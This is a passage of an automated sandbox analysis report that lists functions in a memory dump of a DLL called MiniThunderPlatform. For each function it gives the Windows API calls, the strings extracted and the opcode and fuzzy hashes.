                                                                                                                                              APIs
                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,1005C250,00000000,00000000,?), ref: 1005C275
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2422867632-0
                                                                                                                                              • Opcode ID: 032e930d9c25e7802aab28cc96a9eafe430ba0fb2b1b6718e5f178cddfc0da8a
                                                                                                                                              • Instruction ID: 833b794a87b0be5d1f9fffccf711842dbee02d958d5455eccaa96f6b227bb74a
                                                                                                                                              • Opcode Fuzzy Hash: 032e930d9c25e7802aab28cc96a9eafe430ba0fb2b1b6718e5f178cddfc0da8a
                                                                                                                                              • Instruction Fuzzy Hash: 7DD012B21452207EF2248780DC4EF93779CDB44B11F10412AF70A991C0E6A0680486B1
                                                                                                                                              Function 1002C68F Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFileAttributesA.KERNEL32(?,1002C6D8,?), ref: 1002C6A2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AttributesFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                              • Opcode ID: 1a2bc1791117567ebe49a75bf9dc4b934438f03a63209767dab7614a4eefe951
                                                                                                                                              • Instruction ID: 22871d837e2da699c9e068563c9c478554dbe41011fecf3ae9d1369fbc7dfc4c
                                                                                                                                              • Opcode Fuzzy Hash: 1a2bc1791117567ebe49a75bf9dc4b934438f03a63209767dab7614a4eefe951
                                                                                                                                              • Instruction Fuzzy Hash: 72D0C9B29102449BA614CBB4EA9DC0536A2FA512297D65A90E122E61A1D775ED80E640
                                                                                                                                              Function 10114674 Relevance: 1.5, APIs: 1, Instructions: 13COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71(?,?,10002351), ref: 1011467F
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                              • Opcode ID: fdade90b7a7cbaa3b4b4654a7ae387be37e743b46f1c041e9449e9aa76966473
                                                                                                                                              • Instruction ID: cd1dc9a476dadd5327f3150f99930fa3d5138f510381ae8471ca80410973a2d9
                                                                                                                                              • Opcode Fuzzy Hash: fdade90b7a7cbaa3b4b4654a7ae387be37e743b46f1c041e9449e9aa76966473
                                                                                                                                              • Instruction Fuzzy Hash: 92D0C972511B118BE7248A19E50975273D8DB0073BF12C81DA45AC6481CBBCE8848A58
                                                                                                                                              Function 10016F63 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 613200358-0
                                                                                                                                              • Opcode ID: f6b7979110d42926b71d47fbfc1e9282be8b892ad41eae3aa9c1fb846e50efcc
                                                                                                                                              • Instruction ID: 4ac9a794276c3a55641821f1cffe84ad2a0c05efd76b07b10a691c9a9c0010aa
                                                                                                                                              • Opcode Fuzzy Hash: f6b7979110d42926b71d47fbfc1e9282be8b892ad41eae3aa9c1fb846e50efcc
                                                                                                                                              • Instruction Fuzzy Hash: BAC08C3250D22020D115E12C7D1079E49C8CF0A2A6F158ABFFD02EB1418AB6DCD341A9
                                                                                                                                              Function 1004FF10 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 1004F9B0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,102448B9,000000FF), ref: 1004F9EF
                                                                                                                                                • Part of subcall function 1004F9B0: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,102448B9,000000FF), ref: 1004F9FC
                                                                                                                                                • Part of subcall function 1004F9B0: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,102448B9,000000FF), ref: 1004FA09
                                                                                                                                                • Part of subcall function 1004F9B0: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,?,102448B9,000000FF), ref: 1004FA5E
                                                                                                                                                • Part of subcall function 1004F9B0: ??3@YAXPAX@Z.MSVCR71(?), ref: 1004FA74
                                                                                                                                                • Part of subcall function 1004F9B0: RtlDeleteCriticalSection.NTDLL ref: 1004FA97
                                                                                                                                                • Part of subcall function 1004F9B0: ??3@YAXPAX@Z.MSVCR71(?,?,?,?,?,?,?,?,102448B9,000000FF), ref: 1004FAAB
                                                                                                                                              • ??3@YAXPAX@Z.MSVCR71 ref: 1004FF20
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ??3@$CloseHandle$CriticalDeleteSection
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 679368468-0
                                                                                                                                              • Opcode ID: 5721ad3d46f05e7b82d4ca4016dfb79f7f4f5f7c8edf0cf9b855c5a584f6ddba
                                                                                                                                              • Instruction ID: 5c302d48c91b2ed09b1a92db39870ba592cb5c296baae22bf8d9168f26d8fdbb
                                                                                                                                              • Opcode Fuzzy Hash: 5721ad3d46f05e7b82d4ca4016dfb79f7f4f5f7c8edf0cf9b855c5a584f6ddba
                                                                                                                                              • Instruction Fuzzy Hash: 36C08CA290826032C501D2242805B9A64C48F22151F15447ABD01C1252D5AAED8482DA
                                                                                                                                              Function 1021AB50 Relevance: 1.5, APIs: 1, Instructions: 6threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 1021AB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CurrentThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2882836952-0
                                                                                                                                              • Opcode ID: d7e2d775319cd06972e6149f9762e3aa1da99bd289b598c73233e3583fef7f91
                                                                                                                                              • Instruction ID: ce6a8410c8876d8b152aa68c293f1e983512d0ce6b5e9abb2e2282d378a5211e
                                                                                                                                              • Opcode Fuzzy Hash: d7e2d775319cd06972e6149f9762e3aa1da99bd289b598c73233e3583fef7f91
                                                                                                                                              • Instruction Fuzzy Hash: 56B092342011008FC300CB30C98C90ABBF1FFAC302B01C468F406CB260CB31DC08DA01

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 10071280 Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 227fileCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI@Z.MSVCP71(?,?), ref: 100712CF
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071304
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071311
                                                                                                                                                • Part of subcall function 10070AC0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,000000A8,00000000,102471AA,000000FF,100E6C13), ref: 10070B66
                                                                                                                                                • Part of subcall function 100258AC: malloc.MSVCR71(100104C9,?,100104C9,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 100258C5
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(00000000,?,?), ref: 100713AD
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?), ref: 100713B9
                                                                                                                                              • FindFirstFileA.KERNEL32(?,?,?), ref: 100713FC
                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 10071412
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 10071590
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1007159D
                                                                                                                                                • Part of subcall function 10086B00: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(buffer_len,00000000), ref: 10086B2D
                                                                                                                                                • Part of subcall function 10086B00: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 10086B44
                                                                                                                                                • Part of subcall function 10086B00: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?), ref: 10086BA6
                                                                                                                                                • Part of subcall function 10086B00: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,?), ref: 10086BB8
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$??0?$basic_string@$Find$?assign@?$basic_string@CloseFileFirstV12@V12@@malloc
                                                                                                                                              • String ID: \*.*
                                                                                                                                              • API String ID: 2174148055-1173974218
                                                                                                                                              • Opcode ID: 156aa0e89a59e2f879dd32b2be3ae80a80f92871d5381be747831d969ce655f5
                                                                                                                                              • Instruction ID: de799a7a17a39a8b8ba91a7616dbe325e9134429da6e8c41d2017bef904be378
                                                                                                                                              • Opcode Fuzzy Hash: 156aa0e89a59e2f879dd32b2be3ae80a80f92871d5381be747831d969ce655f5
                                                                                                                                              • Instruction Fuzzy Hash: 82919371D00258EFDB15DBA8CC88BDEBBB5FF69704F048199E44AA3281DB745B48CB61
                                                                                                                                              Function 100C00E0 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 394COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(disable_query_hub,?,00000000), ref: 100C0116
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71 ref: 100C0130
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000000), ref: 100C0163
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C0178
                                                                                                                                              • GetTickCount.KERNEL32 ref: 100C0186
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,backagent), ref: 100C023B
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,00000000,?,?,?,?,?,00000001), ref: 100C02E1
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 100C0690
                                                                                                                                                • Part of subcall function 10089DA0: RtlEnterCriticalSection.NTDLL(?), ref: 10089DC8
                                                                                                                                                • Part of subcall function 10089DA0: RtlLeaveCriticalSection.NTDLL(?), ref: 10089DE7
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,backagent), ref: 100C02F9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,backagent), ref: 100C0518
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0,backagent), ref: 100C05D4
                                                                                                                                                • Part of subcall function 100298F0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z.MSVCP71(102768F0), ref: 10029935
                                                                                                                                                • Part of subcall function 1006E2C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006E2FD
                                                                                                                                                • Part of subcall function 1006E2C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 1006E342
                                                                                                                                                • Part of subcall function 1006E2C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71 ref: 1006E354
                                                                                                                                                • Part of subcall function 100EAED3: __EH_prolog.LIBCMT ref: 100EAED8
                                                                                                                                                • Part of subcall function 100EAED3: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100EAF32
                                                                                                                                                • Part of subcall function 100EAED3: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100EAF3C
                                                                                                                                                • Part of subcall function 100EAED3: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 100EAF49
                                                                                                                                                • Part of subcall function 100EAED3: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100EAFA2
                                                                                                                                                • Part of subcall function 100EAED3: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,00000002), ref: 100EAFD7
                                                                                                                                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP71(?,?,?,?,00000000,?,?,?,?,?,00000000), ref: 100C067F
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??0?$basic_string@$??1?$basic_string@$?assign@?$basic_string@V12@V12@@$CriticalSectionV01@@$CountEnterH_prologLeaveTick
                                                                                                                                              • String ID: backagent$disable_query_hub
                                                                                                                                              • API String ID: 3804703749-972584134
                                                                                                                                              • Opcode ID: 4a0c8295dca151c521fe70958d32171cfc53b134d4fc570c5453c06b53ba06c5
                                                                                                                                              • Instruction ID: 0d0e488f6e4de725e8c9204a1f16edb704d1c077984432cdfb017ff9e3b7daa1
                                                                                                                                              • Opcode Fuzzy Hash: 4a0c8295dca151c521fe70958d32171cfc53b134d4fc570c5453c06b53ba06c5
                                                                                                                                              • Instruction Fuzzy Hash: 62F19E75108B809FE324CB64C894FEBB7EAAF9A704F04894CF5DA47251DB717509CB62
                                                                                                                                              Function 100213BF Relevance: 10.6, APIs: 7, Instructions: 142librarystringCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • lstrlenW.KERNEL32(?), ref: 10021430
                                                                                                                                              • LoadLibraryExA.KERNEL32(00000000,00000000,00000002), ref: 100214A6
                                                                                                                                              • FindResourceA.KERNEL32(00000000,?,?), ref: 100214D1
                                                                                                                                              • LoadResource.KERNEL32(00000000,00000000), ref: 100214DF
                                                                                                                                              • SizeofResource.KERNEL32(00000000,00000000), ref: 100214F8
                                                                                                                                              • memcpy.MSVCR71(?,?,00000000), ref: 1002154C
                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 10021579
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Resource$LibraryLoad$FindFreeSizeoflstrlenmemcpy
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1030141578-0
                                                                                                                                              • Opcode ID: 1f6bfa6f09e80dd48c12bd39c3797e2c8edd1e84e0493b039d262884a3b90c2b
                                                                                                                                              • Instruction ID: 7871f0b035a8fa2eea63476de0ae8ccaad5e3d1a7f3742efaa8bdeece5b6d9a5
                                                                                                                                              • Opcode Fuzzy Hash: 1f6bfa6f09e80dd48c12bd39c3797e2c8edd1e84e0493b039d262884a3b90c2b
                                                                                                                                              • Instruction Fuzzy Hash: 37517AB99001289BCB20DF64DC89ADDBBB5FF58254F8041EAE609A3151DB305EC5CFA8
                                                                                                                                              Function 100010CA Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetThreadLocale.KERNEL32 ref: 100010DD
                                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 100010EF
                                                                                                                                              • GetACP.KERNEL32 ref: 10001118
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                              • Associated: 0000000E.00000002.1619245039.0000000010000000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.00000000102FE000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619279871.0000000010360000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619972434.000000001037F000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              • Associated: 0000000E.00000002.1619997206.0000000010380000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_14_2_10000000_MiniThunderPlatform.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Locale$InfoThread
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4232894706-0
                                                                                                                                              • Opcode ID: 189465c9d6aea507251c6239b9d394ff8cfa3f7cf7cadf4ad4b912c6bb2d0b6d
                                                                                                                                              • Instruction ID: 586b7e93cdd943bc87cdda045440f987dfb5790366435d2031c7dbe035af8b18
                                                                                                                                              • Opcode Fuzzy Hash: 189465c9d6aea507251c6239b9d394ff8cfa3f7cf7cadf4ad4b912c6bb2d0b6d
                                                                                                                                              • Instruction Fuzzy Hash: 8AF0C231E00239ABD715CF60C8595EFB7E8FF09BC1B018298EA42E7240DB71AA0987D0
                                                                                                                                              Function 10029170 Relevance: 72.1, APIs: 39, Strings: 2, Instructions: 332COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP71(?,102768F0,?,?,?), ref: 100291B0
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP71(?), ref: 100291F8
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(://,00000000,00000003), ref: 1002921D
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,-00000003), ref: 10029247
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(?,-00000003,00000001), ref: 10029261
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@II@Z.MSVCP71(?,-00000003,00000000), ref: 10029293
                                                                                                                                              • ?rfind@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(0000002F,00000000,00000001), ref: 100292B9
                                                                                                                                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@II@Z.MSVCP71(?,00000000,00000000), ref: 100292D9
                                                                                                                                              • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII@Z.MSVCP71(00000040,00000000,00000001), ref: 100292F8
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,00000000,00000000), ref: 1002931A
                                                                                                                                              • ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@II@Z.MSVCP71(?,?,?), ref: 10029338
                                                                                                                                                • Part of subcall function 10027700: ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II@Z.MSVCP71(00000000,?,?,?,100291DB,00000000), ref: 1002771C
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027729
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027736
                                                                                                                                                • Part of subcall function 10027700: ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@@Z.MSVCP71(?), ref: 10027743
